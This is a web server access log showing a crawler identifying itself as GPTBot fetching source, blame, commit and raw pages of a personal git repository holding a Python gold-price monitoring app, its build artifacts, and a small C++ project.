git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 11377] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" +[17/Feb/2026:14:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 9860] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" +[17/Feb/2026:14:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 11310] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:14:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" [Client 74.7.227.38] [Length 9935] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" +[17/Feb/2026:14:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12837] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18955] [Gzip 10.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" +[17/Feb/2026:14:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 9866] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" [Client 74.7.227.38] [Length 10977] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" +[17/Feb/2026:14:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 10818] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" +[17/Feb/2026:14:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 10821] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" +[17/Feb/2026:14:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" +[17/Feb/2026:14:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" +[17/Feb/2026:14:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 10334] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12354] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" +[17/Feb/2026:14:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 9865] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" +[17/Feb/2026:14:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 1940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" +[17/Feb/2026:14:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 10333] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 10853] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" +[17/Feb/2026:14:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 10857] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9866] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:14:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9491] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:14:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:14:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 10822] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" +[17/Feb/2026:14:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" [Client 74.7.227.38] [Length 10062] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 12194] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" +[17/Feb/2026:14:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 44615970] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:14:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:14:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9517] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:14:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9525] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:14:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 44573707] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:14:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 522344] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 526125] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9479] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:14:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" +[17/Feb/2026:14:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9863] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:14:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 44981538] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:14:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 635] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:14:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 11446] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:14:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 29729] [Gzip 8.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 9885] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:14:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 858166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:14:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 863930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:14:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:14:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 799945] [Gzip 27.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 